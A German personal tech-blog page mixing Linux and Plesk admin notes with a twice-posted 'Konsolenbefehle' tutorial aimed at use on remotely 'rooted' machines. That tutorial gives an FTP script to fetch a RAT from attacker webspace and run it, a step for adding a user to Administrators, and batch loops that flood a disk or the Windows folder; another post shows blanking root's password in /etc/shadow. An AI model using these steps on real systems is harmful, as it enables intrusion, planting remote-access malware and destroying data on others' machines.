Zeigt die Speicherauslastung der Partitionen des Systems an,

du
Zeigt den Speicherverbrauch einzelner Verzeichnisse an

free
Zeigt die Speicherauslastung des Systems an. Geteilt in RAM und SWAP-Space.

uptime
Zeigt die Uptime der Maschine an. Die Uptime ist die Zeit seit dem letzten Reboot.

User Infos

finger
Gibt den Login-Namen, Real-Namen, Terminal Namen, Schreibstatus,
die Idle-Zeit (Zeit seit der letzten Nutzung des Accounts),
die Login-Zeit, den Standort und die Buero-Telefon-Nummer
des angegebene Useraccounts aus.

groups
Gibt die Gruppenzugehoerigkeit eines Users aus

id
Gibt den eigenen Login-Namen inklusive Gruppe aus

last
Zeigt die letzten Logins an.

logname
Gibt den eigenen Login-Namen aus

w
Um Informationen ueber die momentan ausgefuehrte
Taetigkeit erweitertes who

who
Gibt die Login-Namen der momentan eingelogten User
zusammen mit den Terminal-IDs und dem Login-Zeitpunkt aus

whoami
Gibt den eigenen Login-Namen aus

User-Account Management

chfn
Aendern der User-Informationen eines AccountsRoom-NumberWork-PhoneHome-Phone

chsh
Aendern der Login-Shell eines Useraccounts

exit
Aktuelle Session verlassen

groupadd
Anlegen einer neuen User-Gruppe

groupdel
Loeschen einer bestehenden User-Gruppe

groupmod
Aendern der Daten einer bestehenden User-Gruppe

newgrp
Aendern der aktuellen Gruppe

passwd
Festlegen bzw. Aendern des Passwortes eines Useraccounts

su
Neue Session mit anderem Account aufmachen (su – : root-Account).

sudo
Befehl als root ausfuehren.

useradd
Anlegen eines neuen Useraccounts. Zumindest der
Login-Name muss angegeben werden

userdel
Loeschen eines Useraccounts.

usermod
Aendern eines bestehenden Useraccounts.

Schlagwörter *nix Befehle, linux, linux befehle, linux befehlsliste, linux commands, tux cmds

Konsolenbefehle (CMD und Bash)

Dez12
2009 Kommentieren Geschrieben von Daniel

Wir haben jetzt schon einige Wege kennengelernt, eine Remote-Shell (Konsole) auf einem System zu bekommen. Doch was nützt uns das, wenn wir keine tollen Befehle kenn, mit denen wir die Konsole füttern können? Nichts
Unter Windows ist die Konsole die Eingabeaufforderung oder auch CMD (von command.com) genannt. Unter Linux gibt es verschiedene Konsolen, doch die am meisten genutzte ist wohl die Bash (Burn Again Shell). Auch wenn euch die Shells zu Anfang recht kompliziert vorkommen, wenn man sich mit ihnen angefreundet hat merkt man, dass sie einem relativ viel Arbeit ersparen und vor allen sehr Mächtig sind. Ausserdem sind sie für das Benutzen von Exploit unerlässlich Also fangen wir mal an…

CMD

Wie bereits geschrieben auch Eingabeaufforderung genannt. Unter Windows erreicht ihr sie indem ihr auf Start -> Ausführen -> cmd geht. Die Klammern < > die ich verwende, gehören nicht zum Befehlssyntax, sondern sollen euch nur sagen, dass ihr hier eigene Parameter angeben müsst. Also dann gehen wir mal an die Basics =D Wenn ihr mehr zu einem Befehl wissen wollt gibt als Parameter einfach /? ein und ihr bekommt eine ausführliche Hilfe. Groß- und Kleinschreibung ist bei Windows egal.

<Datei> – öffnet eine Datei
cd <Verzeichnis> – Wechseln in ein Verzeichnis (Change Directory)
cd – Wechselt in das Wurzelverzeichnis (Root-Directory)
cd.. – Wechselt ein Verzeichnis nach oben im Verzeichnisbaum
dir – Listet den Inhalt des Ordners auf in dem ihr euch gerade befindet
dir *.exe – Listet alle Dateien mit der Endung .exe auf (im aktuellen Verzeichnis)
<Festplattenbuchstabe>: – Wechselt auf eine andere Festplatte
del <Datei> – Löscht eine Datei
del *.* – Löscht alle Dateien im aktuellen Verzeichnis
move <Quelle> <Ziel> – Verschieben von Quelle nach Ziel
copy <Quelle> <Ziel> – Kopiert Datei von Quelle nach Ziel
format <Festplattenbuchstabe> – *hrrrr* ^^
mkdir <Name> – Erstellt ein Verzeichnis
rename <Datei1> <Datei2> – Datei1 in Datei2 umbenennen
net user – Gibt uns eine Liste alle Benutzer
net user <Name> – Gibt Informationen über einen bestimmten Benutzer aus
net localgroup – Listet alle lokalen Benutzergruppen auf
net localgroup <Name> – Informationen und Mitglieder einer bestimmten Gruppe
net services – Gibt uns eine Liste alle Dienste sowie deren Status an
net start <Dienst> – Startet einen Dienst
net stop <Dienst> – Stoppt einen Dienst
net send <Hostname/IP> <Nachricht> – Sendet eine Nachricht an einen PC
net user <Name> * /ADD – Fügt einen neuen Benutzer hinzu (Gruppe: Benutzer)
net localgroup <Gruppe> <Name> /ADD – Fügt einen Benutzer einer Gruppe hinzu – Wie wäre es mit Administratoren =D
echo <Irgendwas> – Der Text nach echo wir ausgegeben
echo %<Umgebungsvariable>% – Gibt den Inhalt einer Umgebungsvariable aus
ftp – Startet den FTP-Client
telnet – Startet den Telnet-Client
telnet <Ip/Host> <Port> – Zu einem Rechner auf einem bestimmten Port verbinden
ping <Hostname/IP> – Ping eine IP
set – Zeigt alle Umgebungsvariablen an
title <String> – Verpasst unserer Konsole einen neuen Titel
color <inderhilfegucken> – Farbe gefällig
type <Datei> – Zeigt den Inhalt einer Datei
find “<String>” /i <Datei> – Durchsucht eine Datei nach einem String und ignoriert Groß- und Kleinschriebung
ver – Zeigt uns die aktuelle Windows-Version an
rem <irgendwas> – Macht NIX Mit rem kommentiert man in Batch seinen Code
cls – Löscht den Inhalt der Konsole

Umleitungsoperatoren

dir /s | find “.bmp” /i
dir /s listet den kompletten Verzeichnisbaum inc. Unterverzeichnisse und Dateien auf (also den gesammten Festplatteninhalt). Das Pipe-Symbol | leitet diese Ausgabe jetzt nicht auf den Bildschrim sondern zum Befehl find “.bmp” /i weiter, wo nach dem String .bmp gesucht wird. So bekommen wir alle .bmps die sich auf der Festplatte angezeigt.

echo w00t > new.txt
echo w00t würde eigentlich den Text w00t auf dem Bildschirm ausgeben, doch dieser wir durch den Umleitungsoperator > (ein Krokodil, das den Text auffrisst ) in die Datei new.txt geschrieben. Existiert die Datei nicht, so wird diese erstellt. Existiert die Datei bereits, so wird sie überschrieben.

echo r00t >> new.txt
Der Effekt ist der Gleiche wie bei nur einem Umleitungsoperator, doch wir die Datei nicht überschrieben, falls sie bereits vorhanden ist, sondern wird unsere Ausgabe unten angefügt.

Es gibt noch dem < Umleitungsoperator, aber den hab ich noch nie gebraucht =D

FTP-Script

Jetzt stellt euch aber mal vor ihr habt eine Remote-Shell auf einem Server und wollt eine Datei hochladen. Was machen wir dann? Zuerst holen wir uns etwas Webspace (zB. www.tripod.de) wo wir unsere Datei(en) hochladen, dann schreiben wir uns ein kleines Script und füttern damit den FTP-Client :]

echo open ftp.tripod.de > scr
echo user <Benutername> >> scr
echo <Passwort> >> scr
echo type binary >> scr
echo get <Datei> >> scr
echo quit >> scr
ftp –s:scr –v –n

Jetzt nur noch die Datei ausführen und schon sind wir am Ziel…

Konsolen-Styling

Wenn wir jetzt schon zu Tastatur-Cowboys geworden sind, dann brauchen wir auch eine kewle Shell mit der wir und durch die ganze Welt hacken =D Und mit unserem jetzigen Wissen ist das ganze auch kein Problem mehr =P
Macht einen Rechtsklick auf euren Desktop und geht auf Neu -> Verknüpfung. Jetzt geben wir als Datei folgenden ellenlangen String an:

cmd /k title :: moo’s haXX0r Konsole & color 0a & cd & cls & echo +++++++++++++++++++++++++ & echo + Welcome to HaXX-Shell + & echo +++++++++++++++++++++++++ & ver

Fertig.
cmd /k startet die Konsole und lässt die offen. Der Befehl title legt den Titel des Fensters fest, color 0a sorgt für die Matrix-Farbe, cls löscht den Konsolen-Inhalt, echo gibt eine kewle Begrüßung aus und ver zeigt uns unsere Windows-Version an. Die einzelnen Befehle sind durch & verkettet.

Schrieben wir uns mal ein kleines Batch-Script, dass die Festplatte mit Datenmüll floodet =P Notepad öffnen und folgenden Code abschreiben (kein Copy & Paste). Dann als .bat oder .cmd speichern (nicht als .txt).

@echo off
echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > big
:loop
type big >> big
goto loop

@echo off sorgt dafür, dass die Befehle nicht immer auf dem Bildschirm ausgegeben werden. Dann erstellen wir uns eine Datei mit lauter XXXXX drinne. Setzt setzen wir eine Sprungmarke und lassen und mit type die XXXXX-Datei ausgeben. Aber nicht auf den Bildschirm, sondern fügen den Inhalt noch mal an die Datei big dran. Dann springen wir wieder zur Sprungmarke und das Spiel geht von vorne los =D Die big-Datei wächst also exponentiell (1-2-4-8-16-32-64-128-256-512-1024-usw.) und nach kurzer Zeit ist die Festplatte mit einer Datei voll.

Ein Ordner-Flooder ist auch ganz lustig (:

@echo off
cd C:WINNT
:loop
mkdir %random%%random%%random%
goto loop

Wir wechseln erst in das Windows-Verzeichnis und erstellen dann Ordner mit einer (in unserem Fall drei) Zufallszahl (probiert mal echo %random%) also Ordnernamen. Dann wird geloopt. Schon sind in Sekunden tausende von Ordnern erstellt :>

Ihr seht, mit der Konsole kann man ziemlich viel machen. Ihr habt nur einen Bruchteil der vorhandenen Befehle kennengelernt (alleine der net-Befehl ist riesig und mächtig =D) und viele warten noch darauf von euch benutzt zu werden . Ein kleine Listet erhaltet ihr, wenn ihr in der Konsole einfach mal help eingebt.
Wenn man einigermaßen mit der Konsole umgehen kann, ist es auch keine Arbeit Batch zu lernen, was wirklich einfach ist und trotzdem sehr hilfreich sein kann.

Bash

Meisten bekommen wir beim r00ten von Rechnern ja eine Remote-Shell, auf der wir unser Unwesen treiben können. Und damit wir unsere 1337-Karriere voranzutreiben müssen wir lernen Exploits zu benutzen. Doch die sind fast alle für Linux geschrieben… Wir ihr seht kommt der Ueberhacker von Heute kaum um Linux rum. Also lasst uns mal einen kleinen Blick auf die wichtigsten Befehle werfe =D

pwd – Gibt das aktuelle Arbeitsverzeichnis aus
cd <Verzeichnis> – Wechselt in ein Verzeichnis
cd .. – Geht ein Verzeichnis nach oben im Verzeichnisbaum
ls – Gibt uns den Ordnerinhalt aus
cd – Wechselt ins Home-Verzeichnis
ls –a – Gibt uns den Ordnerinhalt mit erweiterten Informationen aus
mkdir <Name> – Erstellt einen Ordner
mv <Quelle> <Ziel> – Verschiebt von Quelle nach Ziel
rm <Datei> – Löscht Dateien
cp <Quelle> <Ziel> – Kopiert Datei(en)
chmod – Rechteverteilung für Dateien/Ordner. Am besten die Hilfe angucken
cat <Datei> – Gibt den Inhalt einer Datei aus
grep “<String>” <Datei> – Durchsucht eine Datei nach einem String
find <Pfad> <String> – Sucht ausgehen vom Pfad nach Dateien
ln –s <Pfad/Datei> <Linkname> – Erstellt einen Softlink
echo <String> – Gibt einen String aus
touch <Name> – Erstellt eine leere Datei
ps –a – Zeigt alle laufenden Prozesse an
kill <pid> – Einen Prozess beenden
clear – Bildschirminhalt löschen
telnet <Ip/Host> <Port> – Verbindet sich zu einem Rechner auf einem bestimmten Port
joe <Datei> – Lädt eine Datei in Joe (Texteditor; falls installiert>
mc – Startet den Midnight-Commander (falls instelliert)
gcc exp.c –o exp – Compiliert den Code exp.c und erstellt die Datei exp
./exp – führt die Datei exp aus

Das waren jetzt einiger ganz einfach Grundlagen. Aber ich muss das Rad nicht neu erfinden =D Es gibt genug Webseiten und Bücher, die sich ausführlich mit diese, Thema beschäftigen. Also bei Bedarf einfach ein bissel googeln und ihr werdet sich was brauchbares finden.
Die Umleitungsoperatoren funktionieren genau so wie bei Windows, also muss ich darauf nicht näher eingehen (einfach bei CMD noch mal gucken). Und Bash-Scripte werde ich jetzt auch nicht mit euch schreiben.

Geposted in Win Stuff

Install Zend Optimizer on Plesk 9

Apr09
2009 Kommentieren Geschrieben von Daniel

Die aktuelle Version von Zend Optimizer downloaden unter http://www.zend.com/de/products/guard/downloads

^?View Code TEXT

cd /usr/src
wget http://downloads.zend.com/optimizer/...21-i386.tar.gz
 
tar xvzf ZendOptimizer-3.0.2-linux-glibc21-i386.tar.gz
cd ZendOptimizer-3.0.2-linux-glibc21-i386
./install.sh

Jetzt muss alles mit OK beantwortet werden, sobald aber die Frage nach der php.ini kommt. Muss diese mit /etc/php5/apache2 beantwortet werden.

In der etc/php5/apache2/php.ini sollte nun folgendes am ende der Datei stehen:

[Zend]
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-3.0.2
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-3.0.2
zend_optimizer.version=3.0.2
zend_extension=/usr/local/Zend/lib/ZendExtensionManager.so
zend_extension_ts=/usr/local/Zend/lib/ZendExtensionManager_TS.so

WICHTIG:
Bei plesk 9 darf dies aber dort nicht drin sein sondern muss kopiert werden und in die etc/php5/conf.d/ioncube-loader-5.2.ini kopiert werden.

die ioncube-loader-5.2.ini muss dann ca. wie folgt aussehen:

^?View Code TEXT

[Zend]
zend_extension=/usr/lib64/php5/extensions/php_ioncube_loader_lin_5.2_x86_64.so
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-3.3.3
;zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3
zend_optimizer.version=3.3.3
zend_extension=/usr/local/Zend/lib/ZendExtensionManager.so
;zend_extension_ts=/usr/local/Zend/lib/ZendExtensionManager_TS.so

kontrollieren ob alles erfolgreich installiert wurde. Dazu schreibt man in eine PHP-Datei … mit dem inhalt

< ?php
phpinfo();
?>

es sollte folgendes erscheinen …

This program makes use of the Zend Scripting Language Engine:
Zend Engine v2.1.0, Copyright (c) 1998-2006 Zend Technologies
with Zend Extension Manager v1.0.10, Copyright (c) 2003-2006, by Zend Technologies
with Zend Optimizer v3.0.2, Copyright (c) 1998-2006, by Zend Technologies

Zur Information:

Sollte der Fehler PHP Fatal error: [ionCube Loader] The Loader must appear as the first entry in the php.ini file in Unknown on line 0 kommen dann muss man darauf achten das man die Zend zeilen aus der php.ini genommen hat und in die ioncube-loader-5.2.ini geschrieben hat….

Geposted in Plesk

warning: SASL authentication failure: cannot connect to saslauthd server: No such file or directory

Mrz26
2009 Kommentieren Geschrieben von Daniel

Problem: Es ist nicht mehr möglich sich am SASL-Dienst zu Authentifizieren. D.h. wenn man versucht über sein Mailprogramm eine email zu verschicken könnt immer wieder die Passwortabfrage.

in der Logfile (var/log/mail.warn) sind folgende Zeilen zu sehen:

Mar 26 06:28:54 h1297754 postfix/smtpd[29906]: warning: SASL authentication failure: cannot connect to saslauthd server: No such file or directory
Mar 26 06:28:54 h1297754 postfix/smtpd[29906]: warning: SASL authentication failure: Password verification failed
Mar 26 06:28:54 h1297754 postfix/smtpd[29906]: warning: unknown[81.3.241.210]: SASL PLAIN authentication failed: generic failure

Lösung:

Ich konnte das Problem damit lösen das ich im Ordner /etc/sasl2 die file smtpd.conf überprüft habe.

Es müsste in etwa folgendes zu sehen sein, damit es funktioniert:

pwcheck_method: auxprop saslauthd
auxprop_plugin: sql_sqlite3
saslauthd_path: /private/plesk_saslauthd
mech_list: DIGEST-MD5 CRAM-MD5 PLAIN LOGIN
auto_transition: yes
sql_engine: sqlite3
sql_hostnames: localhost
sql_database: /plesk/passwd.db
sql_select: SELECT `%p` FROM domains d, users u WHERE u.name=’%u’ and d.name=’%r’ and d.status=0 and u.status=0 and u.dom_id=d.id
sql_verbose: yes
log_level: 9

Zur information:

* Server gehostet bei strato

* OS: openSUSE 11.0 inkl. Plesk 9.0.1

Geposted in Plesk

Konsolenbefehle (CMD und Bash)

Jun06
2008 Kommentieren Geschrieben von Daniel

Konsolenbefehle (CMD und Bash)

Wir haben jetzt schon einige Wege kennengelernt, eine Remote-Shell (Konsole) auf einem System zu bekommen. Doch was nützt uns das, wenn wir keine tollen Befehle kenn, mit denen wir die Konsole füttern können? Unter Windows ist die Konsole die Eingabeaufforderung oder auch CMD (von command.com) genannt. Unter Linux gibt es verschiedene Konsolen, doch die am meisten genutzte ist wohl die Bash (Burn Again Shell). Auch wenn euch die Shells zu Anfang recht kompliziert vorkommen, wenn man sich mit ihnen angefreundet hat merkt man, dass sie einem relativ viel Arbeit ersparen und vor allen sehr Mächtig sind. Ausserdem sind sie für das Benutzen von Exploit unerlässlich. Also fangen wir mal an…

CMD

Wie bereits geschrieben auch Eingabeaufforderung genannt. Unter Windows erreicht ihr sie indem ihr auf Start -> Ausführen -> cmd geht. Die Klammern < > die ich verwende, gehören nicht zum Befehlssyntax, sondern sollen euch nur sagen, dass ihr hier eigene Parameter angeben müsst. Also dann gehen wir mal an die Basics. Wenn ihr mehr zu einem Befehl wissen wollt gibt als Parameter einfach /? ein und ihr bekommt eine ausführliche Hilfe. Groß- und Kleinschreibung ist bei Windows egal.

- öffnet eine Datei
cd – Wechseln in ein Verzeichnis (Change Directory)
cd – Wechselt in das Wurzelverzeichnis (Root-Directory)
cd.. – Wechselt ein Verzeichnis nach oben im Verzeichnisbaum
dir – Listet den Inhalt des Ordners auf in dem ihr euch gerade befindet
dir *.exe – Listet alle Dateien mit der Endung .exe auf (im aktuellen Verzeichnis)
: – Wechselt auf eine andere Festplatte
del – Löscht eine Datei
del *.* – Löscht alle Dateien im aktuellen Verzeichnis
move – Verschieben von Quelle nach Ziel
copy – Kopiert Datei von Quelle nach Ziel
format – *hrrrr* =D
mkdir – Erstellt ein Verzeichnis
rename – Datei1 in Datei2 umbenennen
net user – Gibt uns eine Liste alle Benutzer
net user – Gibt Informationen über einen bestimmten Benutzer aus
net localgroup – Listet alle lokalen Benutzergruppen auf
net localgroup – Informationen und Mitglieder einer bestimmten Gruppe
net services – Gibt uns eine Liste alle Dienste sowie deren Status an
net start – Startet einen Dienst
net stop – Stoppt einen Dienst
net send – Sendet eine Nachricht an einen PC
net user * /ADD – Fügt einen neuen Benutzer hinzu (Gruppe: Benutzer)
net localgroup /ADD – Fügt einen Benutzer einer Gruppe hinzu – Wie wäre es mit Administratoren =D
echo – Der Text nach echo wir ausgegeben
echo %% – Gibt den Inhalt einer Umgebungsvariable aus
ftp – Startet den FTP-Client
telnet – Startet den Telnet-Client
telnet – Zu einem Rechner auf einem bestimmten Port verbinden
ping – Ping eine IP
set – Zeigt alle Umgebungsvariablen an
title – Verpasst unserer Konsole einen neuen Titel
color – Farbe gefällig =D
type – Zeigt den Inhalt einer Datei
find “” /i – Durchsucht eine Datei nach einem String und ignoriert Groß- und Kleinschriebung
ver – Zeigt uns die aktuelle Windows-Version an
rem – Macht NIX =D Mit rem kommentiert man in Batch seinen Code =P
cls – Löscht den Inhalt der Konsole (falls das FBI gerade kommt =D)

Umleitungsoperatoren

echo mo > new.txt
echo moo würde eigentlich den Text moo auf dem Bildschirm ausgeben, doch dieser wir durch den Umleitungsoperator > (ein Krokodil, das den Text auffrisst ) in die Datei new.txt geschrieben. Existiert die Datei nicht, so wird diese erstellt. Existiert die Datei bereits, so wird sie überschrieben.

Es gibt noch dem < Umleitungsoperator, aber den hab ich noch nie gebraucht.

FTP-Script

Jetzt stellt euch aber mal vor ihr habt eine Remote-Shell auf einem Server und wollt eine Datei hochladen (zB. ein RAT). Was machen wir dann? Zuerst holen wir uns etwas Webspace (zB. www.tripod.de) wo wir unsere Datei(en) hochladen, dann schreiben wir uns ein kleines Script und füttern damit den FTP-Client.

echo open ftp.tripod.de > scr
echo user >> scra
echo
>> scr
echo type binary >> scr
echo get >> scr
echo quit >> scr
ftp –s:scr –v –n

Jetzt nur noch die Datei ausführen und schon sind wir am Ziel.

Konsolen-Styling

Wenn wir jetzt schon zu Tastatur-Cowboys geworden sind, dann brauchen wir auch eine kewle Shell mit der wir und durch die ganze Welt hacken. Und mit unserem jetzigen Wissen ist das ganze auch kein Problem mehr =P
Macht einen Rechtsklick auf euren Desktop und geht auf Neu -> Verknüpfung. Jetzt geben wir als Datei folgenden ellenlangen String an…

cmd /k title :: mygov’s haXX0r Konsole & color 0a & cd & cls & echo +++++++++++++++++++++++++ & echo + Welcome to HaXX-Shell + & echo +++++++++++++++++++++++++ & ver

Fertig =D Noch ein schönes Icon und wir hacken gleich viel besser als zuvor =D
cmd /k startet die Konsole und lässt die offen. Der Befehl title legt den Titel des Fensters fest, color 0a sorgt für die Matrix-Farbe, cls löscht den Konsolen-Inhalt, echo gibt eine kewle Begrüßung aus und ver zeigt uns unsere Windows-Version an. Die einzelnen Befehle sind durch & verkettet.

Blödsinn in Batch…

Schrieben wir uns mal ein kleines Batch-Script, dass die Festplatte mit Datenmüll floodet =D Notepad öffnen und folgenden Code abschreiben (kein Copy & Paste). Dann als .bat oder .cmd speichern (nicht als .txt).

@echo off
echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > big
:loop
type big >> big
goto loop

Ein Ordner-Flooder ist auch ganz lustig =)

@echo off
cd C:WINNT
:loop
mkdir %random%%random%%random%
goto loop

CMD und Batch ist toll :>

Ihr seht, mit der Konsole kann man ziemlich viel machen. Ihr habt nur einen Bruchteil der vorhandenen Befehle kennengelernt (alleine der net-Befehl ist riesig und mächtig) und viele warten noch darauf von euch benutzt zu werden. Ein kleine Listet erhaltet ihr, wenn ihr in der Konsole einfach mal help eingebt.
Wenn man einigermaßen mit der Konsole umgehen kann, ist es auch keine Arbeit Batch zu lernen, was wirklich einfach ist und trotzdem sehr hilfreich sein kann.

Bash

Meisten bekommen wir beim r00ten von Rechnern ja eine Remote-Shell, auf der wir unser Unwesen treiben können. Doch da wir alle Windows-User mit Leib und Seele sind, haben wir keine Ahnung, welche Befehle uns zur Verfügung stehen. Na dann müssen wir wohl ein paar Befehle kennenlernen. Und damit wir unsere 1337-Karriere voranzutreiben müssen wir lernen Exploits zu benutzen. Doch die sind fast alle für Linux geschrieben… Wir ihr seht kommt der Ueberhacker von Heute kaum um Linux rum. Also lasst uns mal einen kleinen Blick auf die wichtigsten Befehle werfe:

pwd – Gibt das aktuelle Arbeitsverzeichnis aus
cd – Wechselt in ein Verzeichnis
cd .. – Geht ein Verzeichnis nach oben im Verzeichnisbaum
ls – Gibt uns den Ordnerinhalt aus
cd – Wechselt ins Home-Verzeichnis
ls –a – Gibt uns den Ordnerinhalt mit erweiterten Informationen aus
mkdir – Erstellt einen Ordner
mv – Verschiebt von Quelle nach Ziel
rm – Löscht Dateien
cp – Kopiert Datei(en)
chmod – Rechteverteilung für Dateien/Ordner. Am besten die Hilfe angucken
cat – Gibt den Inhalt einer Datei aus
grep “” – Durchsucht eine Datei nach einem String
find – Sucht ausgehen vom Pfad nach Dateien
ln –s – Erstellt einen Softlink
echo – Gibt einen String aus
touch – Erstellt eine leere Datei
ps –a – Zeigt alle laufenden Prozesse an
kill – Einen Prozess beenden
clear – Bildschirminhalt löschen
telnet – Verbindet sich zu einem Rechner auf einem bestimmten Port
joe – Lädt eine Datei in Joe (Texteditor; falls installiert>
mc – Startet den Midnight-Commander (falls instelliert)
gcc exp.c –o exp – Compiliert den Code exp.c und erstellt die Datei exp
./exp – führt die Datei exp aus

Das waren jetzt einige ganz einfache Grundlagen. Aber ich muss das Rad nicht neu erfinden… Es gibt genug Webseiten und Bücher, die sich ausführlich mit diese, Thema beschäftigen. Also bei Bedarf einfach ein bissel googeln und ihr werdet sich was brauchbares finden!
Die Umleitungsoperatoren funktionieren genau so wie bei Windows, also muss ich darauf nicht näher eingehen (einfach bei CMD noch mal gucken). Und Bash-Scripte werde ich jetzt auch nicht mit euch schreiben =D

Geposted in Win Stuff

install psybnc on linux

Mrz31
2008 Kommentieren Geschrieben von Daniel

1. At first download the latest source.
2. wget http://www.psybnc.info/source/psyBNC-2.3.2-7-auto.tar.gz
3. Extract the source with ‘tar -xzf psyBNC-2.3.2-7-auto.tar.gz‘
4. Now type ‘cd psybnc‘
5. AUTO version is named AUTO because install himself. just type: ./setup or ./install
6. Edit the ‘psybnc.conf‘ or create it with “menuconfig” but at first you have to compile it with ‘make menuconfig‘.

Configuration example:

Listening ports – On which port should the psyBNC listen?
Links – Not needed yet.
Bouncer Name – Name your Bouncer. Something like ‘MyBouncer’ works fine.
Host Allows – To allow anyone set this to ‘*’.
Users – Add yourself..
DCC Host – The IP to use for all DCC sessions (if you enabled DCC support). Recommend setting is the same IP which your bnc use.

Setup is complete. Compile your bouncer with “make” in your psyBNC directory. Type ‘./psybnc‘ to start.

Root Passwort löschen

Mrz25
2008 Kommentieren Geschrieben von Daniel

Nehmen wir mal an daß du SuSe installiert hast, Dich als “root” einloggen willst, aber Dein
Passwort vergessen hasst… SHiT !!! Watt machen wa da ???
So, nun erstmal was zum Aufbau…

Linux speichert die Passwörter in der “shadow” Datei, die sich im Verzeichnis “/etc” befindet.
Aber wie bekommen wir Zugriff auf die Datei ??? Hmmm…

Du startest Deinen PC mit der Bootdisk von SuSe oder direkt von der CD.
Im Hauptmenü wählst Du Die Option “System starten”. Im nachfolgenden Fenster die Option
“Rettungssystem starten” und “CD-ROM”. Nach dem Start von SuSe loggst Du Dich als “root”
ein, drückst bei der Passwortabfrage einfach ENTER. Jetzt kommt erstmal
“…have a lot of fun…” oder so, aber das ist ja auch egal.

Nun mountest Du die Linux Partition Deiner Festplatte. Mit dem Befehl “fdisk -l” verschaffst
Du Dir erstmal einen Überblick über die Partition. Die Bezeichnung der Linux Partition ist
“Linux Native” und die ID “83″. Jetzt bestimmst Du den Gerätenamen der Partition wie etwa
“dev/hda4″. Mit “cd /” wechselst Du ins “\root” Verzeichnis deiner Festplatte (die oberste
Ebene). Mit dem Befehl “ls -lisa” verschaffst Du Dir einen Überblick von den vom Rettungssystem
angelegten Verzeichnissen. Solltest Du kein Verzeichnis namens “mnt” sehen, leg es mit dem
Befehl “mkdir mnt” an. Mit dem Befehl “mount /dev/hda4 /mnt” lädst Du Deine Linux Partition
namens “hda4″ in das “/mnt” Verzeichnis. Nun wechselst Du in das “/mnt/etc” Verzeichnis und
schaust nach, ob die Datei “shadow” sich in diesem befindet.

Nun schaust Du Dir die Datei im VI Editor an (“vi shadow”).
Das Passwort für den root Account steht verschlüsselt in der ersten Zeile zwischen den
Doppelpunkten.

Wechsel mit Esc,i in den Einfügemodus des VI und lösch alle Zeichen zwischen den Doppelpunkten.
Mit “:wq!” (write,quit und ! steht für absolut) speicherst Du die editierte Datei und verläßt
den Editor. Nun noch die Maschine mit “shutdown -r now” rebooten und sich erneut als root
einloggen, nur diesmal brauchst Du kein Passwort .
So, um dem root Account nun ein neues zu geben benutzt Du den Befehl “passwd”.

Und das war auch schon das ganze Geheimnis rund um den lokalen Linux Root Hack.
…have a lot of fun…

apt-get Package Management

Mrz16
2008 1 Kommentar Geschrieben von Daniel

Heres a tutorial on how to use the apt-get package management system in Debian and its derivitives. I will cover command line use of apt-get, the aptitude program and the Synaptic Package Manager. I wrote it myself and ive also posted it on techtuts, feel free to link to it.

Debian uses apt-get package management. It looks at a series of defined repositories (servers) for the package(s) you want and will download them if they are there. The repositories are defined in the file

/etc/apt/sources.list

You can edit that file directly (make sure you have root) or use frontends like the Synaptic Package Manager or Software Sources (Menu item) in the distro.

Command Line Usage

To install a package you need to use the apt-get install command. For example to install the IRC program XChat you would type into the console.

sudo apt-get install xchat

It would prompt you for your root password and then list information about the package and would double check you still want to download and install it.

To remove a package you would use the apt-get remove command. This will remove the package files but will keep the configuration files incase you install the same application at a later date. If you wanted to remove XChat you would type into the console.

sudo apt-get remove xchat

To completely remove a package and leave no trace of it you would use the apt-get –purge remove command. If you wanted to completely remove XChat you would type into the console.

sudo apt-get –purge remove xchat

To upgrade packages on your system you would use the apt-get -u upgrade command. This would update all your packages but before updating them, would list them for you to see. If you wanted to update packages on your system you would type into the console.

sudo apt-get -u

To do a complete distro upgrade (Eg upgrade from Ubuntu Fiesty Fawn to Ubuntu Gutsy Gibbon then you would use the apt-get -u dist-upgrade command. Its considered to be good practice in reinstalling your system when a new release comes out or only dist-upgrade once or twice. It can lead to breaks in the OS and sluggishness. If you wanted to dist-upgrade your system you would type into the console.

sudo apt-get -u dist-upgrade

Again, it would show you what packages you would be upgrading before actually starting.

Aptitude

aptitude is a Command Line/Basic GUI tool for installing packages using apt-get. If your still not comfortable with full command line usage but the Synaptic Package Manager takes up too much system resources on your system then aptitude might be right for you. You can start it with the command

sudo aptitude

It launches a basic GUI in the console in which you can browse packages by category and search for them.

Once you have found the package you want to install, you can confirm it and it will download and install it.

Synaptic Package Manager

The Synaptic Package Manager is one of the most widely used applications in Debian based systems. Its got a friendly and easy to navigate GUI. Like aptitude its really just an apt-get frontend but new users seem to like it.

Although it may seem basic, it provides updating, installing, removing, purging, searching and an editor for /etc/apt/sources.list all in one.

[eBook] WLAN – WarDriving

Feb19
2008 Kommentieren Geschrieben von Daniel

Dieses eBook behandelt die (oft nicht vorhandenen) Sicherheitsaspekte bei WLAN’s. Es wird erklärt war WarDriving und WarChalking ist und wie es funktioniert. Des weiteren eine kleine Einführung wie man den WLAN-Verkehr abhört und die Theorie hinter einem erfolgreichen WEP-Angriff. Als Abrundung einige Tipps und Tricks für das hauseigene WLAN und wie man es schützen kann.

Download: [eBook] – WLAN Hacking Wardriving Anleitung

Geposted in eBooks, Mac Stuff, Win Stuff

Allgemein (39)
Börse (6)
Coding (7)
- C (1)
- PHP (4)
eBooks (3)
Forex Stuff (2)
Games (3)
General (3)
Handy Stuff (4)
Hardware (2)
Informatives (5)
iPhone (1)
Lesenswertes (12)
Linux Stuff (20)
- Plesk (7)
Mac Stuff (14)
- Bugs (1)
- Tipps&Tricks (6)
News (1)
SAP (1)
Security Informations (14)
SEO (2)
SEO @en (1)
Stock market (1)
- Forex (1)
Testberichte (1)
Vorlagen (9)
Web Stuff (3)
Win Stuff (56)
- Bugs (21)
- Downloads (4)
- Tipps&Tricks (28)
XXX (1)

Einträge in der Kategorie Linux Stuff

CISCO Befehlsliste (Router und Switches)

mcrypt auf Mac OS X Snow Leopard 10.6.4 installieren

Plesk 9 größere eMails werden nicht verschickt (postfix)

Spamdyke unter Plesk 9 installieren und konfigurieren

Plesk Default smtp_psa und smtps_psa

FTP Server unter Debian einrichten

FTP über Terminal

Horde/Atmail immer auf https umleiten

Die Linux Grundlagen

Linux Server absichern

Linux Befehle

Konsolenbefehle (CMD und Bash)

